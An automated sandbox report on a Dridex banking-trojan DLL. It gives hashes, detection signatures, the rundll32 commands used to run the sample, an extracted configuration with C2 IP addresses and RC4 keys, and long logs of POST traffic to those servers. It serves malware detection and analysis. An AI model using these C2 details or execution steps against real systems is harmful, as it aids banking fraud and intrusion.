Loading ...

Play interactive tourEdit tour

Windows Analysis Report SecuriteInfo.com.Variant.Razy.980776.9478.23455

Overview

General Information

Sample Name:SecuriteInfo.com.Variant.Razy.980776.9478.23455 (renamed file extension from 23455 to dll)
Analysis ID:510687
MD5:6fd1917b9317cb3a563452406ee6b42e
SHA1:ca04deff186c8177bc45b1d71fc0d9f7cd77e89e
SHA256:a0a2052a31550ac810368f5aa8e2e9d4f309758e6b3391f9ba27c52ccb9f4ed5
Tags:dll
Infos:

Most interesting Screenshot:

Detection

Dridex
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected Dridex unpacked file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Detected Dridex e-Banking trojan
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Queries the installation date of Windows
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6832 cmdline: loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.9478.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 6888 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.9478.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6972 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.9478.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6960 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.9478.dll,Bluewing MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 7024 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.9478.dll,Earth MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 7052 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.9478.dll,Masterjust MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

Threatname: Dridex

{"Version": 10444, "C2 list": ["192.46.210.220:443", "143.244.140.214:808", "45.77.0.96:6891", "185.56.219.47:8116"], "RC4 keys": ["9fRysqcdPgZffBlroqJaZHyCvLvD6BUV", "syF7NqCylLS878kcIy9w5XeI8w6uMrqVwowz4h3uWHHlWsr5ELTiXic3wgqbllkcZyNGwPGihI"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000003.411045678.00000000046D0000.00000040.00000001.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
    00000007.00000002.816097382.000000006E931000.00000020.00020000.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
      00000006.00000003.380770170.00000000007C0000.00000040.00000010.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
        00000002.00000002.815049595.000000006E931000.00000020.00020000.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
          00000008.00000003.400629828.00000000008D0000.00000040.00000001.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
            Click to see the 2 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            9.3.rundll32.exe.46edb55.0.raw.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
              9.3.rundll32.exe.46edb55.0.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                8.3.rundll32.exe.8edb55.0.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                  2.3.loaddll32.exe.10edb55.0.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                    6.3.rundll32.exe.7ddb55.0.raw.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                      Click to see the 7 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 7.2.rundll32.exe.6e930000.0.unpackMalware Configuration Extractor: Dridex {"Version": 10444, "C2 list": ["192.46.210.220:443", "143.244.140.214:808", "45.77.0.96:6891", "185.56.219.47:8116"], "RC4 keys": ["9fRysqcdPgZffBlroqJaZHyCvLvD6BUV", "syF7NqCylLS878kcIy9w5XeI8w6uMrqVwowz4h3uWHHlWsr5ELTiXic3wgqbllkcZyNGwPGihI"]}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: SecuriteInfo.com.Variant.Razy.980776.9478.dllReversingLabs: Detection: 38%
                      Source: SecuriteInfo.com.Variant.Razy.980776.9478.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.3:49741 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.3:49743 version: TLS 1.2
                      Source: SecuriteInfo.com.Variant.Razy.980776.9478.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: c:\Gun\208-town\521\exa\botto\party.pdb source: loaddll32.exe, 00000002.00000002.815295434.000000006E9F7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.816408400.000000006E9F7000.00000002.00020000.sdmp, SecuriteInfo.com.Variant.Razy.980776.9478.dll
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E95CEF8 FindFirstFileExW,

                      Networking:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.77.0.96 235
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.56.219.47 180
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.46.210.220 187
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 143.244.140.214 40
                      C2 URLs / IPs found in malware configurationShow sources
                      Source: Malware configuration extractorIPs: 192.46.210.220:443
                      Source: Malware configuration extractorIPs: 143.244.140.214:808
                      Source: Malware configuration extractorIPs: 45.77.0.96:6891
                      Source: Malware configuration extractorIPs: 185.56.219.47:8116
                      Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
                      Source: Joe Sandbox ViewASN Name: KELIWEBIT KELIWEBIT
                      Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 45.77.0.96 45.77.0.96
                      Source: Joe Sandbox ViewIP Address: 185.56.219.47 185.56.219.47
                      Source: global trafficTCP traffic: 192.168.2.3:49742 -> 143.244.140.214:808
                      Source: global trafficTCP traffic: 192.168.2.3:49746 -> 45.77.0.96:6891
                      Source: global trafficTCP traffic: 192.168.2.3:49748 -> 185.56.219.47:8116
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50125 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50165 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50134 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50133 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50142 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50150 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50149 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50133
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50134
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50158 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50149
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50142
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50141
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50150
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50086 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
